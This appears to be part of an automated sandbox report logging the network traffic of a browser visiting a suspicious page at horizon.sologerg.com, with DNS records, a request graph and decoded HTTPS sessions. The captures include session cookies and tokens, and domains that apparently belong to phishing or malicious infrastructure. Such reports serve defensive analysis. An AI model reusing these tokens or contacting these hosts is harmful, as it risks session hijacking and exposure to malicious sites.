Feb 26, 2024 18:12:50.711760998 CET	1.1.1.1	192.168.2.5	0xeef1	No error (0)	nvohxxicwod.trcvtoke.ru		172.67.193.41	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:51.971939087 CET	1.1.1.1	192.168.2.5	0x1802	No error (0)	nvohxxicwod.trcvtoke.ru		172.67.193.41	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:51.971939087 CET	1.1.1.1	192.168.2.5	0x1802	No error (0)	nvohxxicwod.trcvtoke.ru		104.21.20.153	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:51.975792885 CET	1.1.1.1	192.168.2.5	0x9604	No error (0)	nvohxxicwod.trcvtoke.ru			65	IN (0x0001)	false
Feb 26, 2024 18:13:56.195096970 CET	1.1.1.1	192.168.2.5	0xf5e3	No error (0)	windowsupdatebg.s.llnwi.net		69.164.0.0	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:13:56.195096970 CET	1.1.1.1	192.168.2.5	0xf5e3	No error (0)	windowsupdatebg.s.llnwi.net		69.164.0.128	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients1.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.113	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.139	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.100	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.102	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.138	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.034275055 CET	1.1.1.1	192.168.2.5	0x73ad	No error (0)	clients.l.google.com		172.253.63.101	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:08.035459995 CET	1.1.1.1	192.168.2.5	0x900d	No error (0)	clients1.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

clients2.google.com

accounts.google.com

horizon.sologerg.com

https:

nvohxxicwod.trcvtoke.ru

www.bing.com

a.nel.cloudflare.com

fs.microsoft.com

slscr.update.microsoft.com

clients1.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	142.251.167.139	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:39 UTC	752	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-117.0.5938.132 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:39 UTC	732	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-mz_q2Pwsy20nzMCD8ZWdpA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 26 Feb 2024 17:12:39 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6265 X-Daystart: 33159 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-26 17:12:39 UTC	520	IN	Data Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 36 35 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 33 31 35 39 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6265" elapsed_seconds="33159"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2024-02-26 17:12:39 UTC	200	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2024-02-26 17:12:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	172.253.122.84	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:39 UTC	680	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
2024-02-26 17:12:39 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-02-26 17:12:39 UTC	1799	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 26 Feb 2024 17:12:39 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: script-src 'report-sample' 'nonce-Me1Okr6_oY5CZmjNVwi4RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQJiIR6O9t7P69gELvz-P4sRALbEF_8" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-26 17:12:39 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-02-26 17:12:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49705	104.21.20.93	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:39 UTC	657	OUT	GET /hihihji/ HTTP/1.1 Host: horizon.sologerg.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:43 UTC	751	IN	HTTP/1.1 520 Date: Mon, 26 Feb 2024 17:12:42 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dTR7S2086hubIAE7HBAz5m%2FYaDQQYrrWQkDDFq4dbWOAxLXfc18J7xeMA1W6yzlOpFuauNoTGbYISMIfsSI4Y%2F2wUYbzc7O6jK%2FiniSmN9We6gFtsoDymMXk7n%2BduSsuB3nOH%2Ff5yg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 85b9d06e4bd272ef-IAD alt-svc: h3=":443"; ma=86400
2024-02-26 17:12:43 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30 Data Ascii: error code: 520

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	104.21.20.93	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:43 UTC	604	OUT	GET /favicon.ico HTTP/1.1 Host: horizon.sologerg.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://horizon.sologerg.com/hihihji/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:43 UTC	730	IN	HTTP/1.1 404 Not Found Date: Mon, 26 Feb 2024 17:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: max-age=14400 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l%2Fmjx%2FGUaeB8U48LlYJnrEEI%2FJi%2FwRyC63ZriRj2xv%2Bn27zPYBNXds6BqwMVwR09s%2BRoJe18lOBQ2XtGQy17xuUrrGXlyde20VfLtBvFCFg4cGE2nQ7%2BXlzckhHc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 CF-Cache-Status: EXPIRED Server: cloudflare CF-RAY: 85b9d08699103b20-IAD
2024-02-26 17:12:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	35.190.80.1	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:43 UTC	555	OUT	OPTIONS /report/v3?s=dTR7S2086hubIAE7HBAz5m%2FYaDQQYrrWQkDDFq4dbWOAxLXfc18J7xeMA1W6yzlOpFuauNoTGbYISMIfsSI4Y%2F2wUYbzc7O6jK%2FiniSmN9We6gFtsoDymMXk7n%2BduSsuB3nOH%2Ff5yg%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://horizon.sologerg.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:43 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 26 Feb 2024 17:12:43 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	35.190.80.1	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:43 UTC	492	OUT	POST /report/v3?s=dTR7S2086hubIAE7HBAz5m%2FYaDQQYrrWQkDDFq4dbWOAxLXfc18J7xeMA1W6yzlOpFuauNoTGbYISMIfsSI4Y%2F2wUYbzc7O6jK%2FiniSmN9We6gFtsoDymMXk7n%2BduSsuB3nOH%2Ff5yg%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 398 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:43 UTC	398	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 38 37 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 30 2e 39 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 32 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 68 6f 72 69 7a 6f 6e 2e 73 6f 6c 6f 67 65 72 67 Data Ascii: [{"age":9,"body":{"elapsed_time":3870,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.20.93","status_code":520,"type":"http.error"},"type":"network-error","url":"https://horizon.sologerg
2024-02-26 17:12:44 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Mon, 26 Feb 2024 17:12:43 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	23.221.242.90	443

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:44 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-02-26 17:12:44 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=180764 Date: Mon, 26 Feb 2024 17:12:44 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49721	23.221.242.90	443

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:44 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-02-26 17:12:45 UTC	774	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-CID: 7 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z Content-Type: application/octet-stream X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=180786 Date: Mon, 26 Feb 2024 17:12:45 GMT Content-Length: 55 Connection: close X-CID: 2
2024-02-26 17:12:45 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49723	104.21.20.93	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:47 UTC	651	OUT	GET /hihihji/ HTTP/1.1 Host: horizon.sologerg.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:49 UTC	1172	IN	HTTP/1.1 200 OK Date: Mon, 26 Feb 2024 17:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private X-RateLimit-Limit: 300 X-RateLimit-Remaining: 298 Vary: Accept-Encoding Access-Control-Allow-Origin: * X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=41bzmksQCH9%2BbIL28vR9TMKqMBfpuy424mznJrUOl1qG0xDT7l01Pdu%2BPMe6yOUwetHKpYAYr3D9wC88lYtUdUBxKlwSjuYW%2BT1C6E6Xb0wv1fj0vjR%2Bnc27Xq5o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 Set-Cookie: XSRF-TOKEN=eyJpdiI6IkZpZWtES3BFdzhRQysxUUMzUHVEeXc9PSIsInZhbHVlIjoibWkvbWxyeHlPR2VFN2ZhSzBUZC80NVc2WkxoWHJpem1jQU94V1BXMFM1SlRvTHZFY3pNVU9iY1JKdFNsaVNWTzVOUVQvKzRra0NPdlpFcHhoZkZ0NjJHVC9KcmlhNXlkbEQ1Y1dBK1lsY0RweFR4S1hNcFlza1NoQnJGcHlEZVYiLCJtYWMiOiI3YTA0ODQ2Njk5ODE5OGU0MzA3ODdlZjVlYmMyNDEwZWMxZmNjNTk2OWEwNDBmYmM3MTdhMzEwYzVkZTZjNWQwIiwidGFnIjoiIn0%3D; expires=Mon, 26-Feb-2024 19:12:49 GMT; Max-Age=7200; path=/; secure; samesite=none
2024-02-26 17:12:49 UTC	518	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 67 33 51 33 63 32 59 57 6c 55 63 6e 56 30 65 44 68 6d 59 53 74 55 55 53 74 45 62 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 44 56 48 63 55 46 4d 63 58 70 45 62 57 4e 44 51 57 56 4b 5a 33 4e 4f 62 55 39 4c 64 45 56 54 59 57 64 4d 61 6e 68 74 54 53 74 6b 5a 56 55 34 54 44 4e 6b 54 47 31 6c 65 6e 5a 56 61 6d 5a 31 54 30 46 4c 64 6b 6c 5a 4d 6b 5a 6c 64 54 46 36 53 32 68 55 55 57 6b 31 62 58 55 34 64 57 64 35 59 31 68 6b 4e 47 59 33 4e 45 64 4e 55 44 41 32 62 7a 51 76 4c 33 56 36 63 54 64 43 52 53 74 74 61 6d 6c 4b 53 6d 74 30 51 6e 55 72 64 55 6c 4f 51 31 42 61 64 6e 4e 72 56 47 74 59 4e 30 39 49 52 6d 6f 30 63 31 5a 6a 59 57 30 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Img3Q3c2YWlUcnV0eDhmYStUUStEbVE9PSIsInZhbHVlIjoiSDVHcUFMcXpEbWNDQWVKZ3NObU9LdEVTYWdManhtTStkZVU4TDNkTG1lenZVamZ1T0FLdklZMkZldTF6S2hUUWk1bXU4dWd5Y1hkNGY3NEdNUDA2bzQvL3V6cTdCRSttamlKSmt0QnUrdUlOQ1BadnNrVGtYN09IRmo0c1ZjYW0
2024-02-26 17:12:49 UTC	1369	IN	Data Raw: 31 64 30 34 0d 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 7d 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 48 59 59 48 72 45 74 75 6c 43 20 7b 0d 0a 20 20 30 25 20 7b 0d 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0d 0a 20 20 7d 0d 0a 20 20 31 30 30 25 20 7b 0d 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0d 0a 20 20 7d 0d 0a 7d 0d 0a 2e 54 53 55 57 6f 54 4e 4b 77 74 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 74 6f 70 3a 20 35 30 25 3b 0d 0a 20 20 6c 65 66 74 3a 20 35 30 25 3b 0d 0a 20 20 77 69 64 74 68 3a 20 32 34 Data Ascii: 1d04<style>body { margin: 0;}@keyframes HYYHrEtulC { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); }}.TSUWoTNKwt { border-radius: 50%; position: absolute; top: 50%; left: 50%; width: 24
2024-02-26 17:12:49 UTC	1369	IN	Data Raw: 6c 74 59 53 77 69 54 6d 6c 79 62 57 46 73 59 53 42 56 53 53 49 73 52 32 46 6b 64 57 64 70 4c 43 4a 54 5a 57 64 76 5a 53 42 59 59 6d 39 34 49 46 4e 35 62 57 4a 76 62 43 49 73 49 6c 4e 6c 5a 32 39 6c 49 46 56 4a 49 46 4e 35 62 57 4a 76 62 43 49 73 49 6b 31 6c 61 58 4a 35 62 79 42 56 53 53 49 73 49 6b 74 6f 62 57 56 79 49 46 56 4a 49 69 78 55 64 57 35 6e 59 53 77 69 54 47 46 76 49 46 56 4a 49 69 78 53 59 57 46 32 61 53 77 69 53 58 4e 72 62 32 39 73 59 53 42 51 62 33 52 68 49 69 78 4d 59 58 52 6f 59 53 78 4d 5a 57 56 73 59 58 64 68 5a 47 56 6c 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 57 57 46 49 5a 57 6b 67 56 55 6b 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 53 6d 68 6c 62 6d 64 49 5a 57 6b 67 56 55 6b 69 4c 43 4a 4e 59 57 78 6e 64 57 34 67 52 Data Ascii: ltYSwiTmlybWFsYSBVSSIsR2FkdWdpLCJTZWdvZSBYYm94IFN5bWJvbCIsIlNlZ29lIFVJIFN5bWJvbCIsIk1laXJ5byBVSSIsIktobWVyIFVJIixUdW5nYSwiTGFvIFVJIixSYWF2aSwiSXNrb29sYSBQb3RhIixMYXRoYSxMZWVsYXdhZGVlLCJNaWNyb3NvZnQgWWFIZWkgVUkiLCJNaWNyb3NvZnQgSmhlbmdIZWkgVUkiLCJNYWxndW4gR
